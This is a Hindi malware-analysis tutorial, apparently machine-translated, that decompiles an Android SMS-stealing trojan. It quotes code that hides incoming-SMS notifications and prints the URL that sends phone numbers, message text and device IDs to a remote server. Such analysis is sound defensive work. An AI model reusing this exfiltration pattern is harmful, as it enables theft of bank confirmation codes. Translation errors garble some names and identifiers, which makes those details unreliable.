🦐 🛫 🖐🏽 ट्रोजन- Spy.AndroidOS.Zbot.a / Android.Smssniffer / Android / SpySMS / AndroidOS_SMSREP.B के उदाहरण का उपयोग करके Android के लिए मैलवेयर का विश्लेषण 😜 🥇 👨🏻‍🔧

विषय की सामग्री को निम्नानुसार दर्शाया जा सकता है:

1. एपीके फाइलों के बारे में सामान्य जानकारी
2. मैलवेयर का विश्लेषण
2.1 पार्सिंग के लिए उपयोगिताएँ
२.२ विश्लेषण

1. एपीके जानकारी

एंड्रॉइड के लिए मैलवेयर अनुसंधान की सुविधाओं को बेहतर ढंग से समझने के लिए, आपको सबसे पहले यह समझना होगा कि एपीके फाइलें क्या हैं। यदि आप यह पहले से ही जानते हैं, तो आप सीधे दूसरे भाग में जा सकते हैं।

Android कार्यक्रमों को अभिलेखागार में वितरित किया जाता है। इन अभिलेखागार में एक्सटेंशन ".apk" है। ऐसी फाइलें एन्क्रिप्ट नहीं की जाती हैं और "ज़िप" प्रारूप के साथ संगत होती हैं, वास्तव में इसका सबसेट है।

चूंकि कस्टम एंड्रॉइड एप्लिकेशन एक जावा मशीन में चलते हैं, एपीके फाइलें जेएआर फाइलों की सभी विशेषताओं को प्राप्त करती हैं।

संग्रह की सामग्री आमतौर पर कुछ इस तरह दिखती है:

META-INF कैटलॉग में शामिल हैं:

CERT.RSA - आवेदन प्रमाण पत्र
CERT.SF - संसाधन फ़ाइलों (चित्र, ध्वनि, आदि) के चेकसम
MANIFEST.MF - सेवा जानकारी जो apk फ़ाइल का वर्णन करती है

रेस निर्देशिका में संसाधन होते हैं - कई प्रस्तावों में आइकन, एक्सएमएल फ़ाइल में फॉर्म पर तत्वों के प्लेसमेंट का विवरण।

AndroidManifest.xml - एप्लिकेशन के बारे में सेवा की जानकारी (एसडीके संस्करण जिसके द्वारा एप्लिकेशन बनाया गया था, ओएस संस्करण जिसके तहत आवेदन काम करेगा, आदि)। इस फ़ाइल में तथाकथित "अनुमति" भी शामिल है - आवेदन के लिए आवश्यक अनुमतियाँ (उदाहरण के लिए, नेटवर्क तक पहुंच या फोन बुक तक पहुंच)।

classes.dex - एप्लिकेशन का निष्पादन योग्य कोड। यह फ़ाइल हमें सबसे पहले रुचती है।

resource.arsc - संसाधनों की तालिका। इस फ़ाइल में सभी संसाधनों का xml वर्णन है

जब आप Android के लिए मैलवेयर शुरू करना चाहते हैं, तो आपको सभी संक्षिप्त जानकारी जानना आवश्यक है।

2. मैलवेयर का विश्लेषण

एक उदाहरण के रूप में, हमने एक उदाहरण चुना जो विभिन्न एंटीवायरस द्वारा पता लगाया जाता है:

ट्रोजन-Spy.AndroidOS.Zbot.a
Android.Smssniffer
Android / SpySMS
AndroidOS_SMSREP.B

अधिक स्कैन के परिणाम - www.virustotal.com/file-scan/report.html?id=f6239ba0487ffcf4d09255dba781440d2600d3c509e6601e6a5724912df34a9-13101061505050505090

इसलिए, हमारे पास एक संदिग्ध .apk फ़ाइल है। इससे क्या लेना-देना?

2.1 पार्सिंग के लिए उपयोगिताएँ

निम्नलिखित उपयोगिताओं की आवश्यकता है:

Android एसडीके
Jx "dex2jar" के लिए डेक्स और एपीके फ़ाइलों का कन्वर्टर
जावा बाइटकोड डिकम्पॉइलर (जार फाइलें) समझ में आता है

सभी उपयोगिताओं मुफ्त डाउनलोड के लिए उपलब्ध हैं और क्रॉस-प्लेटफॉर्म हैं, इसलिए आप विंडोज और लिनक्स दोनों पर सभी क्रियाएं कर सकते हैं।

२.२ विश्लेषण

बहुत शुरुआत में, यह समझने के लिए कि वास्तव में क्या देखना है, आपको फ़ाइल "AndroidManifest.xml" का विश्लेषण करने की आवश्यकता है - देखें कि विश्लेषण किए गए आवेदन के लिए क्या विशिष्ट अनुमतियाँ आवश्यक हैं। यह फाइल बाइनरी है, न कि प्लेन टेक्स्ट xml। इसे पढ़ने के लिए आपको एंड्रॉइड एसडीके से कंसोल उपयोगिता "एप्ट" का उपयोग करना होगा। यह प्लेटफॉर्म-टूल्स डायरेक्टरी में स्थित है। चूंकि कोई ग्राफ़िकल इंटरफ़ेस नहीं है, इसलिए कमांड को कंसोल में दर्ज किया जाना चाहिए। उदाहरण के लिए, विंडोज के लिए:

C:\android-sdk-windows\platform-tools\aapt.exe l -a C:\incoming\suspicious.apk

बेशक, आपको अपने रास्तों को बदलना चाहिए। लिनक्स पर, कमांड स्पष्ट अंतर के साथ एक ही होगा (कोई ड्राइव अक्षर नहीं होगा और उपयोगिता पर कोई "एक्सई" एक्सटेंशन नहीं होगा)। सुविधा के लिए, आउटपुट को एक फ़ाइल में पुनर्निर्देशित किया जा सकता है:

C:\android-sdk-windows\platform-tools\aapt.exe l -a C:\incoming\suspicious.apk>>C:\incoming\manifest.txt

फ़ाइल में आपको "Android मेनिफ़ेस्ट" अनुभाग ढूंढना होगा और अनुमतियों की गणना के लिए देखना होगा। विश्लेषित फ़ाइल में, यह इस तरह दिखता है:

"android.permission.READ_PHONE_STATE" (Raw: "android.permission.READ_PHONE_STATE")
"android.permission.INTERNET" (Raw: "android.permission.INTERNET")
"android.permission." (Raw: "android.permission.RECEIVE_SMS")

इस जानकारी से, यह स्पष्ट हो जाता है कि कार्यक्रम फोन की स्थिति प्राप्त कर सकता है (उदाहरण के लिए, "कॉल मोड में फोन", "डेटा रिसेप्शन मोड में फोन", शर्तों की एक पूरी सूची शामिल है - developer.android.com/reference/android/teffphony/TelephonyManager.html , यह अनुमति उस फोन नंबर को प्राप्त करने के लिए भी आवश्यक है जिस पर प्रोग्राम चल रहा है), नेटवर्क के साथ काम करें और एसएमएस के आगमन की निगरानी करें। इन पहलुओं पर आगे के विश्लेषण में ध्यान केंद्रित करने की आवश्यकता है।

कोड तक पहुंचने के लिए, आपको दो चरण करने होंगे - एपीके फ़ाइल को जार फ़ाइल में बदलना और परिणामी बायोटकोड को अधिक मानव-पठनीय रूप में अपघटित करना।

हम "dex2jar" कनवर्टर का उपयोग करते हैं:

C:\dex2jar\dex2jar.bat C:\incoming\suspicious.apk

परिवर्तित फ़ाइल मूल फ़ाइल के समान निर्देशिका में स्थित होगी। “.Dex2jar.jar” को उसके नाम के साथ जोड़ा जाएगा, अर्थात इस उदाहरण में यह “संदेहास्पद। pk.dex2jar.jar” होगा।

इस फ़ाइल को एक डिकंपाइलर के साथ खोला जा सकता है। डिकम्प्रीलर विंडो में पैकेज पदानुक्रम इस तरह दिखता है:

तैयारी के चरण जो खुद को आसान विवरण के लिए उधार देते हैं - आगे की सफलता केवल जावा के आपके ज्ञान और खोज इंजन का उपयोग करने की क्षमता पर निर्भर करती है।

सौभाग्य से, उदाहरण के लिए चयनित उदाहरण में मामूली आयाम हैं - अंतिम जार केवल 7.01 KB है।

कार्यक्रम में केवल छह कक्षाएं हैं। उन लोगों को छोड़ दें जो ब्याज के नहीं हैं। यह वर्ग आर है, जो केवल सभी संसाधनों के पहचानकर्ताओं को सूचीबद्ध करता है। इसके अलावा विचार से हम विन्यास वर्ग को बाहर कर सकते हैं, जिसमें बिल्ड कॉन्फ़िगरेशन शामिल है।

आइए शेष तीन वर्गों पर अधिक विस्तार से विचार करें।

सक्रियण

इस वर्ग को चालू घटना से शुरू किया जाता है, अर्थात्, आवेदन शुरू होने के तुरंत बाद।

TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone"); - इसमें एक स्थानीय टेल्फोनीमैनेजर स्ट्रक्चर बनता है, जिसमें यह डिवाइस के बारे में डेटा देता है

str1 = localTelephonyManager.getDeviceId(); - प्राप्त डेटा से डिवाइस की पहचान संख्या का चयन करता है और स्ट्रिंग स्ट्रिंग 1 पर रखता है

अगला एक लूप है जो DeviceId को चार अंकों के टुकड़ों में विभाजित करता है, एक हाइफ़न सम्मिलित करता है "-" उनके बीच, यानी XXXX-XXXX-XXXX-XXXX XXXXXXXXXXXXXXXX से प्राप्त होता है। संख्या और हाइफ़न के परिणामस्वरूप स्ट्रिंग को पहचानकर्ता 2131034112 के साथ TextView में पास किया गया है।

SmsReciever

एसएमएस संदेश आने पर, इस घटना को चालू कर दिया जाता है।

इस वर्ग का कार्य आने वाले एसएमएस की निगरानी करना है और, यदि यह पता चला है, तो इसे एक नए संदेश के लिए एक पॉइंटर पास करते हुए, MainService वर्ग चलाएं।

MainService

यह वर्ग काफी बड़ा है, इसलिए मैं इसे इसकी संपूर्णता में नहीं दूंगा। कॉल के तुरंत बाद, यह उपवर्ग "SmsBlockerThread" लॉन्च करता है, जो आने वाले एसएमएस की अधिसूचना को अवरुद्ध करता है ताकि उपयोगकर्ता को एक नए आने वाले एसएमएस की सूचना न हो।

फिर आने वाले एसएमएस को इस तरह से संसाधित किया जाता है:

String str1 = localSmsMessage.getOriginatingAddress(); - प्राप्तकर्ता फोन नंबर (वह फोन नंबर जिस पर ट्रोजन स्थापित है) को चर str1 में रखा गया है

String str2 = localSmsMessage.getMessageBody(); - संदेश निकाय को चर str2 में रखा गया है

फिर संबंधित जोड़े localBasicNameValuePair1 और localBasicNameValuePair2 बनाये जाते हैं जिसमें मान रखे जाते हैं

f0=< >
b0=< >

ये जोड़े स्थानीयअरलिस्ट सरणी में संग्रहीत किए जाते हैं, जिसमें बाद में वे स्थानीयबेसिकनामल्यू पेयर 3 जोड़ी जोड़ते हैं, जो है

id=<id >

उसी समय, जैसा कि आप देख सकते हैं, DeviceId को फिर से प्राप्त किया जाता है, न कि सक्रियण वर्ग में जो प्राप्त किया गया था, उसका उपयोग किया जाता है।

यह अंतिम सर्वर सत्र वर्ग से postRequest विधि को कॉल करने के साथ समाप्त होता है:

पैरामीटर जोड़े का एक ही सरणी है जिसमें फोन नंबर, एसएमएस सामग्री और डिवाइस पहचानकर्ता पारित किए जाते हैं।

ServerSession

इस वर्ग के दो तरीके हैं: initUrl, जो लिंक के हिस्से को लौटाता है "(http://softthrifty.com/security.jsp)":

और बड़ी पोस्टRestestest विधि जिसे MainService क्लास से बुलाया गया था। आकार के बावजूद, postRequest कार्य सरल है - सर्वर को डेटा भेजें, जो initUrl विधि द्वारा लौटाए गए लिंक का उपयोग करके, MainService में एकत्रित सरणी से जोड़े जोड़कर। यही है, बस लिंक पर जाएं:

(http://softthrifty.com/security.jsp?f0= <फ़ोन नंबर> और b0 = <संदेश पाठ> और आईडी = <डिवाइस आईडी>)

परिणाम

तो, यह ट्रोजन एसएमएस को स्वीकार करता है और सर्वर को एक अनुरोध भेजता है, जिसमें यह संक्रमित फोन नंबर, एसएमएस सामग्री और संक्रमित फोन की पहचानकर्ता को भेजता है। यह व्यवहार दो-कारक प्रमाणीकरण पर हमला करने वाले बैंकिंग ट्रोजन का संकेत हो सकता है। सिम्बियन मोबाइल प्लेटफ़ॉर्म के लिए ज़ोटोब के नमूनों में वही व्यवहार विशिष्ट था। एक सफल हमले के लिए, निम्नलिखित शर्तों की आवश्यकता होती है:

1) हमलावर को ऑनलाइन बैंकिंग के लिए डेटा अवरोधन करने के लिए पीड़ित के कंप्यूटर को संक्रमित करना चाहिए;
2) हमलावर को पीड़ित के फोन को बैंक से पुष्टिकरण कोड के साथ एसएमएस अवरोधन करने के लिए संक्रमित करना चाहिए;
3) हमलावर को किसी भी तरह से संक्रमित कंप्यूटर और संक्रमित फोन के उपयोगकर्ता को यह जानने के लिए जोड़ना होगा कि ऑनलाइन बैंकिंग के लिए यह पुष्टि कोड क्या है;

मुझे पता नहीं है कि इस तरह का मैलवेयर कितना वास्तविक है, लेकिन इसके आकार और इसकी गतिविधियों की स्पष्टता से, इस तरह का नमूना एंड्रॉइड के लिए मैलवेयर के लिए बुनियादी तकनीकों को प्रदर्शित करने के लिए अच्छी तरह से अनुकूल है।

ट्रोजन- Spy.AndroidOS.Zbot.a / Android.Smssniffer / Android / SpySMS / AndroidOS_SMSREP.B के उदाहरण का उपयोग करके Android के लिए मैलवेयर का विश्लेषण